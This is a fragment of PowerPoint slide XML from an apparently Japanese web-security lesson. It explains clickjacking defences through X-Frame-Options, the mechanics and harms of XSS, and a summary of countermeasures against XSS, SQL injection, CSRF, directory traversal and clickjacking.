        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3595338" y="3153269"/>
            <a:ext cx="5001323" cy="1219370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41267778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755CC8-123C-DED6-B427-D64F914C5006}"/>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66C9DAE1-0317-0465-DDCD-A59DE216CD8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クリックジャッキング対策</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>レスポンスヘッダに、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>X-Frame-Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ヘッダフィールドを出力し、他ドメインのサイトからの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>要素や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>要素による読み込みを制限する。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="テキスト ボックス 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5325B4D6-A054-0E95-A742-BFEFBBEF65D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4354002" y="6340365"/>
            <a:ext cx="7837998" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>出典：https://www.ipa.go.jp/security/vuln/websecurity-HTML-1_9.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="表 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDD01A7F-70DE-D985-8A72-8AE34A6F458B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3537962547"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1589819" y="3868382"/>
          <a:ext cx="9012362" cy="1483360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2071641">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1949604512"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6940721">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="335049460"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>設定値</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>frame</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>要素および</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
                        <a:t>iframe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>要素により表示できる範囲</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1167461424"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>DENY</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>すべてのウェブページにおいてフレーム内の表示を禁止</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="123933172"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>SAMEORIGIN</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>同一オリジンのウェブページのみフレーム内の表示を許可</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2260304885"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>ALLOW-FROM</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>指定したオリジンのウェブページのみフレーム内の表示を許可</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="359323515"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32114658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428DC0-B2BB-9D68-2C1B-594A3F58F117}"/>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2C2692BC-E292-5B46-83F5-BC6BA9B1DBA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クリックジャッキング対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>以下のコードを</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Flask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>実行より前の部分に挿入する</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="図 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E06901-FFD8-3547-DDF0-B49BEF18CE69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1999678" y="3681244"/>
            <a:ext cx="8192643" cy="1228896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27849667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4F7DF7-FD91-965A-565D-000A37B9624C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クリックジャッキング</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDAD8445-ABE5-F698-E1AC-F1BFE6FB231E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クリックジャッキング対策</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>読み込まれなくなり、罠用のテキストボックスとボタンが重なって表示される</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="図 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2CD0070-B7C0-2376-8708-803CD1ED6816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900300" y="3199917"/>
            <a:ext cx="4391400" cy="3382565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4481182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8C5B78-A759-4FBE-D975-FFA5865840C0}"/>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35060F43-9FE6-0E2D-E2A1-13E2780CFACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4861422"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正アクセスは刑法と不正アクセス禁止法に触れる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サイバー犯罪の中で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>番目に多いのがインジェクション</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正アクセスの被害は大まかに「不正ログイン」「漏洩」「改竄」「不正送信」など</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策は文字列を</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>html.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を用いる</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクション対策はプレースホルダを用いる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策はワンタイムトークンによる認証を用いる</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル対策はファイル名のみを取り出す</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クリックジャッキングは同一ドメイン以外ページ埋め込みを禁止する</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2843893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4551A8-80DF-715F-F638-714B31E7C692}"/>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7E68E0BF-A22A-9ACC-59CB-ACF7FBDC1778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の仕組み</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>コード</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のソースコードで</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が動くようになっている。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF74BB06-2962-C100-90C8-A090F3744F91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1661493" y="2915292"/>
            <a:ext cx="8869013" cy="2172003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9455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515E4-B4C3-356D-DD5C-18B9753367CD}"/>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CE272AC5-21D7-3C00-E8AE-20CC28C38B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の被害の代表例</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クッキーの漏洩</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ内に保存されている情報やクッキーの中にはログインしたユーザの情報をセッションで管理しており、クッキーの内容を表示するスクリプトで第三者に情報漏洩が起きる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>意図しないページへジャンプ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ページ内にページジャンプするスクリプトを入れることで意図しない有害サイトに飛ばされることがある。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2732968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CDCF68-143F-1CAD-4229-24A2F77E7FB2}"/>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680EA93E-0DAD-F4A9-10F0-F0DC299A0647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クッキーの漏洩</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ライブラリ・データベース</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>・セッション発行・無画面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E62640-6829-4DC0-B64E-EECA5B690438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465108" y="2741229"/>
            <a:ext cx="5261783" cy="3838473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
